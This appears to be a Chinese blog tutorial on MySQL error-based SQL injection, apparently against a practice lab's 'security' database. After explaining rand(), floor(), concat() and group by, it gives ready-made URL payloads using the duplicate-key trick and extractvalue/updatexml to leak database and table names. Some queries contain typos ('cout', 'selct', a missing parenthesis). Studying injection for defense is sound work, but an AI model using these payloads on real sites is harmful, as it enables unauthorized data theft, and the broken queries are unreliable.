小知识
select count(*) from table1;
select rand();
生成一个随机数
select floor(1.56);
向下取整
select floor(rand()*2;
取一个随机0-1的整数
select floor (rand()*2)a;
给这个命令取一个名字a
select * from table1 group by id ;
以id来进行分组
select concat(1,2,3);
把字符拼接起来
0x3a = :
0x7e=~
select concat(0x3a,0x3a,(select database()),0x3a,0x3a)a;
::库名::
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
selct count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from table1;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from table1 group by a;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from table1 group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2));
在mysql官方解释里面,ran()函数,每次都会重新计算一次
-------------------------------------------------------------------------------
报错注入
如果输入错误就会报错,如果输入正确,会查数据库,但是不显示东西
暴露库名
index.php?id=2' AND (select 1 from (select cout(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a)b) --+
index.php?id=2' AND (select 1 from (select cout(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x3a,0x3a,floor(rand()*2)) a from information_schema.tables group by a)b) --+
---------------------------------------------------
----------------------------------------------------
简单高效
'and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+
'and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
扫一扫
1747
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
